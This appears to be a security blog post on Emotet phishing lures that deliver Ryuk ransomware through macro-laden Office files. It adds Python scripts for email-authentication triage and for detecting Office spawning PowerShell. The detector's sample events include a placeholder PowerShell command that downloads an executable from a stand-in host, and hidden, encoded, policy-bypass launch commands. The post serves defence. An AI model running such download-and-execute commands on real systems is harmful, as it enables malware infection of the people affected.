This week, Abnormal Security researchers have been tracking recent, well-disguised attacks from a Russian criminal enterprise, which use the Emotet Trojan to drop Ryuk ransomware and BazarLoader for financial gain.
Ryuk ransomware attack
The Federal Bureau of Investigation (FBI) and the Department of Homeland Security (DHS) issued a warning earlier this week of an impending attack using Ryuk ransomware, noting that healthcare and the public sector are the intended targets.
Abnormal Security has detected these attacks being launched against a broader array of industries and targets and has identified similar messages, which are detailed below. The attacks bypass traditional email security protections because the payloads are placed within cloud-based Google Docs and Microsoft Word files.
- Attack #1: Impersonating internal department for financial remittance - The request purports to come from an external vendor about a financial remittance. However, the attacker spoofed the vendor’s legitimate domain, and the message failed authentication. This was done so the target would trust the content of the email and click the link. Abnormal Security also observed a mail rule change, which forked the conversation to an impersonated domain. The sender’s IP originates from a VPN service based in Pokrova, Russia.
- Attack #2: Impersonating external vendor about agreement cancellation - In this example, the attacker impersonates a vendor and alerts the target about the end of an agreement, asking them to click a Google Doc link for compensation details.
- Payload for Attacks #1 and #2: A malware-infected Microsoft Excel spreadsheet posing as a Google Doc - In both cases, the email link leads to a page that automatically downloads a Microsoft Excel attachment which, when opened, asks the user to ‘Enable Macros’. The downloaded file contains VBA code that runs once ‘Enable Macros/Content’ is selected. The VBA code then launches a PowerShell script, which downloads a payload: a malicious executable file. With this, the attacker can do whatever they choose, typically downloading other malware or running specific commands.
- Attack #3: Impersonating internal department about a medical report - The email impersonates an internal contact attempting to send a medical report to a coworker. The main email itself does not contain much content, but it does include impersonated forwarded information below the request (not shown) to give the appearance of a legitimate thread.
- Microsoft Office Wizard prompting to open on desktop - If the user does not complete the task, a Microsoft Office prompt again asks them to view and edit the document by clicking ‘Enable Editing’ and ‘Enable Content’.
- Attack #4: Impersonating HR department for a survey - In this example, the email impersonates an internal contact attempting to send an HR survey to a co-worker. The sending domain is not the organization’s official one; the entity is being impersonated.
- Malware-infected survey form on Google Drive - The survey contains links to malware. The attacker prompts the target to open the documents on a desktop rather than a mobile device, so that the attack can be carried out.
- Payload for Attacks #3 and #4: Infected Microsoft Word Doc with Macros - In both cases, the link leads to a Microsoft Word document that asks the target to upgrade their edition to add new features by clicking ‘Enable Editing’ and ‘Enable Content’. The result is that .exe files run and infect the target with malware.
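Attack #1 hinges on two signals a mail gateway already has in hand: the spoofed vendor domain failed authentication, and the conversation was forked to an impersonated domain. The script below is an added example (not Abnormal Security's detection logic) of a triage check that reads the Authentication-Results header of a message, flags DMARC and SPF failures, and, as a heuristic added here for the forked-conversation behaviour, flags a Reply-To domain that differs from the From: domain. Both sample messages, and every domain, address and IP in them, are constructed placeholders.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample modelled on Attack #1 (not a real captured message):
# the From: header shows the vendor's real-looking domain, but SPF and DMARC
# fail because the sender never controlled that domain, and a Reply-To
# header steers replies to a look-alike domain. All values are placeholders.
SPOOFED_RAW = """\
Authentication-Results: mx.corp.example; spf=fail (sender IP is 203.0.113.7) smtp.mailfrom=vendor.example; dkim=none header.d=none; dmarc=fail (p=reject) header.from=vendor.example
From: Accounts Payable <ap@vendor.example>
To: finance@corp.example
Reply-To: ap@vendor-example.test
Subject: Remittance details
Content-Type: text/plain

Please review the remittance document at the link below.
"""

# Constructed clean counterpart: same vendor, every method passes, no Reply-To.
CLEAN_RAW = """\
Authentication-Results: mx.corp.example; spf=pass smtp.mailfrom=vendor.example; dkim=pass header.d=vendor.example; dmarc=pass (p=reject) header.from=vendor.example
From: Accounts Payable <ap@vendor.example>
To: finance@corp.example
Subject: Remittance details
Content-Type: text/plain

Invoice attached as discussed.
"""

AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.I)


def parse_auth_results(value):
    """Map an Authentication-Results header to {'spf': ..., 'dkim': ..., 'dmarc': ...}.
    Methods absent from the header are reported as 'none'."""
    found = {method.lower(): result.lower() for method, result in AUTH_RE.findall(value)}
    return {m: found.get(m, "none") for m in ("spf", "dkim", "dmarc")}


def domain_of(header_value):
    """Extract the lower-cased domain from a From:/Reply-To: style header."""
    return parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def reply_path_diverges(msg):
    """True when Reply-To points at a different domain than From:.
    Heuristic added here for the 'forked conversation' behaviour the post
    describes; it is not the post's own detection logic."""
    reply_domain = domain_of(msg.get("Reply-To"))
    return bool(reply_domain) and reply_domain != domain_of(msg.get("From"))


def triage(raw_message):
    """Return authentication results, the reasons found, and a quarantine verdict."""
    msg = message_from_string(raw_message)
    auth = parse_auth_results(msg.get("Authentication-Results", ""))
    reasons = []
    # A DMARC failure on a domain that publishes a policy is the strongest
    # signal that the visible From: domain was spoofed.
    if auth["dmarc"] == "fail":
        reasons.append("dmarc_fail")
    # SPF failed and there is no passing DKIM signature to fall back on.
    if auth["spf"] == "fail" and auth["dkim"] != "pass":
        reasons.append("spf_fail_without_dkim")
    if reply_path_diverges(msg):
        reasons.append("reply_to_domain_mismatch")
    return {"auth": auth, "reasons": reasons, "quarantine": bool(reasons)}


if __name__ == "__main__":
    for label, raw in (("spoofed", SPOOFED_RAW), ("clean", CLEAN_RAW)):
        print(label, triage(raw))
```

The check trusts the Authentication-Results header, so it belongs on the gateway that wrote that header, not on an endpoint where an attacker could forge one; a real deployment would also verify the authserv-id (the first token in the header) matches your own mail infrastructure.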
Rise in malware and ransomware attacks
Based on the recent volume, these attacks are becoming more widespread. In each case, the threat actors convince the targets to take low-consequence actions, such as enabling macros, in order to execute the malware.
By hiding the malware behind links and macros inside Google Docs and Microsoft Word files, the attackers add a layer of obfuscation to evade traditional email security protection.
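Because the link-in-a-doc delivery slips past the email layer, the payload chain described for all four attacks (Excel or Word macro, VBA launching a PowerShell script, script downloading an executable) is where endpoint telemetry gets its chance. The script below is an added example, not Abnormal Security's tooling: it classifies process-creation events in which an Office application spawns a script host and looks at the child's command line for download primitives, encoded commands, hidden windows and execution-policy bypass. The events, paths, URL and base64 string are constructed placeholders; only powershell.exe is named by the post, and the other script hosts are additions.

```python
import re

# Office applications the post names as macro carriers (Excel for Attacks #1/#2,
# Word for #3/#4), plus the script hosts a macro commonly shells out to.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line traits that, under an Office parent, mark a macro downloader.
INDICATORS = {
    "download_primitive": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|net\.webclient", re.I),
    "encoded_command": re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    "policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass\b", re.I),
}

# Constructed process-creation events (Sysmon event 1 style fields; every
# path, URL and base64 value is an invented placeholder).
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -ep bypass -enc QQBBAEEAQQBBAEEA"},
    {"id": 2, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -NoP Invoke-WebRequest http://payload.invalid/update.exe -OutFile $env:TEMP\\update.exe"},
    {"id": 3, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c echo done"},
    {"id": 4, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -enc QQBBAEEA"},
]


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event):
    """Return the names of the traits matched by one process-creation event.
    An empty list means no Office-to-script-host relationship was seen."""
    parent = basename(event.get("parent_image", ""))
    child = basename(event.get("image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return []
    hits = ["office_spawned_script_host"]
    cmd = event.get("command_line", "")
    hits.extend(name for name, rx in INDICATORS.items() if rx.search(cmd))
    return hits


def severity(hits):
    """Office spawning a script host alone is worth a look; any command-line
    indicator on top of it is treated as high."""
    if not hits:
        return "none"
    return "high" if len(hits) > 1 else "medium"


def scan(events):
    """Run every event through classify() and keep only those that fired."""
    findings = []
    for ev in events:
        hits = classify(ev)
        if hits:
            findings.append({"id": ev["id"], "hits": hits, "severity": severity(hits)})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Event 4 shows why the parent matters: an encoded PowerShell launched from Explorer is noisy in many environments, while the same command line under Excel or Word is almost never legitimate. Pair the rule with the Office policy that blocks macros in files downloaded from the internet, which removes the ‘Enable Content’ step the attacks rely on.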